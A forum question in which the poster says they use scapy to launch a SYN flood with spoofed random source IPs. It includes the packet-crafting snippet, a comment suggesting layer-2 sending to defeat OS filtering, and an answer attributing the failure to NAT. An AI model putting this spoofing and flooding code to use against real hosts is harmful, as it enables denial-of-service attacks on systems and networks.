# Python "scapy": fake ip unable to cheat tcpdump

Tags: wireshark, scapy, tcpdump, ddos

I use "scapy" to launch SYN flood attack.
Below code generate a fake IP as source IP

The attacker computer's wireshark capture the generated fake IP as source IP, but
the victims computer's tcpdump capture attacker's real IP（NOT the fake IP）

Is scapy unable to cheat tcpdump? or something error with my code?

```
        IP_Packet = IP()
        IP_Packet.src = randomIP()  #generate a fake IP as source IP
        IP_Packet.dst = dstIP

        TCP_Packet = TCP()
        TCP_Packet.sport = s_port
        TCP_Packet.dport = dstPort
        TCP_Packet.flags = "S"
        TCP_Packet.seq = s_eq
        TCP_Packet.window = w_indow

        send(IP_Packet / TCP_Packet, verbose=0)
```

Comment: This could be a restriction of your OS, noticing something is wrong... you could also try to go a layer below using `Ether()/IP()/...` and `sendp` Instead of `send`

Answer (score 0):

If the victim computer isn't on the same network as the attacker, your router is likely replacing the source IP during the NAT translation.  the Victim is receiving the (correct) public IP address, instead of the (spoofed) private IP address